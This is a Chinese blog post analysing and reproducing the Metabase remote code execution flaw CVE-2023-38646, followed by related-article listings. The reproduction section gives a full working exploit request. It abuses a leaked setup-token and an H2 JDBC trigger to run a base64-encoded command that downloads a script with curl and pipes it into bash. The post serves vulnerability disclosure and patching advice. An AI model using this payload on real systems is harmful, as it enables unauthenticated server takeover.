漏洞分析|Metabase 远程代码执行漏洞(CVE-2023-38646)

于 2023-11-02 18:04:17 发布
阅读量242 收藏
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandaoren/article/details/134188303
版权

1.漏洞描述

Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。

Metabase open source 0.46.6.1之前的版本和Metabase Enterprise 1.46.6.1之前的版本存在一个漏洞,允许攻击者在服务器的权限级别上执行任意命令。利用时不需要身份验证。

2.影响版本

Metabase open source 0.46 < 0.46.6.1

Metabase Enterprise 1.46 < 1.46.6.1

Metabase open source 0.45 < v0.45.4.1

Metabase Enterprise 1.45 < 1.45.4.1

Metabase open source 0.44 < 0.44.7.1

Metabase Enterprise 1.44 < 1.44.7.1

Metabase open source 0.43 < 0.43.7.2

Metabase Enterprise 1.43 < 1.43.7.2

3.影响范围

4.漏洞复现

访问http://192.168.77.142:3000/api/session/properties

需要先获取到setup-token

POC

POST /api/setup/validate HTTP/1.1
Host: 192.168.77.142:3000
Content-Type: application/json
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Content-Length: 804

{
    "token": "89a6ac54-4d90-4db9-a8b7-9469be8b4848",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,Y3VybCAxOTIuMTY4Ljc3LjE0Mjo4ODY0LzEudHh0}|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

5.漏洞分析

令牌泄露

在Metabase 进行安装时,存在一个特殊的令牌setup-token,按照官方预设的流程,一般来说其只能存在一次,在安装结束之后便会清除,但是官方完成安装后移除setup-token 这个重要的的操作给移除了。

https://github.com/metabase/metabase/commit/0526d88f997d0f26304cdbb6313996df463ad13f#diff-bf3f2797f327779cbbd6bfab7e45261c7ee93b29db6828d2ee0ad17acf4d7825L33

这导致了完成安装后 properties仍然存在setup-token

所以我们可以通过/api/session/properties来读取 setup-token

现在 我们已经拿到了 setup-token 以用于调用setup api。

JDBC RCE

src/metabase/api/setup.clj
存在路由/api/setup/validate,用于验证数据库是否连接成功

它会通过api.database/test-database-connection来处理输入的参数完成对数据库的校验
跟进到src/metabase/api/database.clj

就是一个JDBC Connection

根据pyn3rd师傅分享的https://blog.pyn3rd.com/2022/06/06/Make-JDBC-Attacks-Brillian-Again-I/可以知道,可以通过以下三种方式攻击H2数据库

  1. RUNSCRIPT FROM远程加载sql文件(需要出网)
  2. CREATE ALIAS使用Groovy替代原生Java来定义用户函数(需要Groovy依赖)
  3. CREATE TRIGGER配合 javascript 引擎构建代码执行

我们这里采用第三种方法,无需出网和额外依赖即可使用,javax.script.ScriptEngineManager是Java中用于执行脚本的引擎,只要代码的最开头是 //javascript ,就会被认为是JavaScript脚本,并编译和执行。

6.修复建议

目前官方已发布新版已经修复此漏洞,并且为受影响版本发布了补丁,建议用户尽快升级至最新版本。

官方下载地址:

https://github.com/metabase/metabase/releases

AttackSatelliteLab
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Metabase 远程代码执行(CVE-2023-38646)
失心少年
07-30 481
Metabase是一款开源数据分析及可视化工具。它可允许用户连接至各种不同类型数据源,未经身份认证的攻击者可利用本漏洞在服务器上以运行 Metabase服务器的权限进行任意命令执行
metabase-google-sheets-add-on:将配置数据库问题直接导入到Google表格中
04-29
importQuestion :使用其问题ID号(您可以在问题URL的末尾找到)从Metabase导入单个问题到当前的Google表格标签中 importAllQuestions :使用以下名称约定导入Google表格中的所有问题: (metabase/123) ->导入问题...
【严重】Metabase 基于H2引擎的远程代码执行漏洞
murphysec的博客
08-02 387
Metabase 是一个开源的数据分析和可视化工具。由于 CVE-2023-38646 的补丁(从H2 JDBC连接字符串中删除INIT脚本以防止命令注入)修复不完全,Metabase 仍受到命令注入的影响。攻击者可使用 H2 作为数据库引擎,通过 /api/setup/validate 端点发送恶意构造的 JDBC URI 字符串,在不加载 INIT 脚本的情况下远程执行任意命令。
漏洞分析Metabase 代码执行漏洞CVE-2023-38646):H2 JDBC 深入利用
m0_46699477的博客
07-28 1698
利用 TRIGGER + DefineClass 完整的实现了 JAVA 代码执行漏洞回显。
漏洞复现】Metabase 远程命令执行漏洞(CVE-2023-38646)
做自己喜欢的事,并将其发挥到极致!
08-03 3506
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以服务器的权限级别在服务器上执行任意命令。
Metabase任意文件读取漏洞CVE-2021-41277)
一枚不知名的Java程序猿
10-03 1552
CVE-2021-41277漏洞复现
Goby 漏洞发布|Metabase JDBC 远程代码执行漏洞CVE-2023-38646
m0_46699477的博客
07-28 966
Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 存在远程代码执行漏洞,可导致攻击者在服务器上以运行 Metabase 服务器的权限执行任意代码
开源BI分析工具 Metabase 中存在远程代码执行漏洞,未完全修复
smellycat000的专栏
07-28 309
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士在商业情报 (BI) 领域,开源工具 Metabase 以无缝的数据解释能力占据一席之地。该自助服务BI工具已用于全球各地的组织机构中,赋能用户提出数据问题并获得可视化的、易于理解的答案。Metabase 的设计对用户友好,无需了解SQL或其它编程语言的知识,扩宽了组织机构中的可用性。Metabase 与多种数据来源相连,如关系数据库、云存储和平...
Python库 | metabase_api-0.2.6-py3-none-any.whl
03-22
python库,解压后可用。 资源全名:metabase_api-0.2.6-py3-none-any.whl
2023-0Day(漏洞检测Tools)V1.6 HW-漏洞挖掘-src
最新发布
08-23
32、Metabase_validate远程命令执行 33、用友时空KSOA_imagefield_sql注入 34、宏景HCM_SQL注入 35、华天动力OA未授权访问及SQL注入 36、致远OA_Ajaxdo_upload 37、亿赛通电子文档安全管理系统命令执行
metabase-datomic:Metabase的Datomic驱动程序
02-05
docker run -p 3000:3000 lambdaisland/metabase-datomic 设计决策 请参阅 发展 要获得基于REPL的工作流,请对metabasemetabase-datomic进行git clone,以使它们位于同级目录中 $ git clone git@github....
Metabase 存在任意文件读取漏洞
nnn2188185的博客
04-28 337
Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。
Metabase 信息泄露漏洞CVE-2021-41277)——漏洞复现
W小哥
11-24 2805
一、漏洞简介 metabase 是一个简单、开源的数据分析平台。 CVE-2021-41277 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。 该漏洞CVSS评分:9.9,危害等级:严重 二、影响版本 影响版本: metabase version < 0.40.5 metabase version >= 1.0.0, < 1
CVE-2021-41277——Metabase 信息泄露漏洞
热门推荐
LiBai'S BLOG
11-21 1万+
Metabase 信息泄露漏洞漏洞简介FOFA语法EXP漏洞测试漏洞修复 漏洞简介 Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。 CNNVD编号:CNNVD-202111-1565 危害等级: 超危 CVE编号: CVE-2021-41277 FOFA语法 app="Metabase
metabase-cve_2021_41277
m0_49025459的博客
12-26 170
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。CNNVD编号:CNNVD-202111-1565危害等级: 超危CVE编号: CVE-2021-41277。
CVE-2021-41277(metebase信息泄漏漏洞复现)
haoaaao的博客
04-26 1845
0x00 前置知识 1、metebase metabase是一款开源的BI分析工具,开发语言clojure+React为主、也有高阶的收费版。 官网:Metabase | Business Intelligence, Dashboards, and Data Visualization可以利用Metabase进行数据分析,数据可视化,报表生成等。 Metabase介绍_Sshine___的博客-CSDN博客_metabase 2、影响版本: metabase v...
漏洞复现-metabase-文件包含】vulfocus/metabase-cve_2021_41277
10-15 549
metabase-文件包含】
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8204
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何安装metabase
05-05
安装 Metabase 的步骤如下: 1. 首先,确保你已经安装了 Java 8 或以上版本。你可以在终端中运行以下命令来检查 Java 版本: ``` java -version ``` 2. 下载 Metabase 的最新版,你可以从官网下载,也可以从 Github 下载。 3. 解压下载的文件到你想要安装 Metabase 的目录中。 4. 进入解压后的目录,运行以下命令启动 Metabase: ``` java -jar metabase.jar ``` 5. 在浏览器中访问 `http://localhost:3000`,你将看到 Metabase 的登录页面。 6. 输入你的邮箱地址和密码进行注册并登录。 7. 此时,你可以开始使用 Metabase 来连接你的数据库并进行数据分析。 注意事项: - 如果你需要在生产环境中安装 Metabase,建议你使用一个反向代理服务器,如 Nginx 或 Apache。 - Metabase 默认使用 H2 数据库,如果你需要连接其他数据库,你需要下载并安装相应的 JDBC 驱动程序。详情可以参考 Metabase 官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值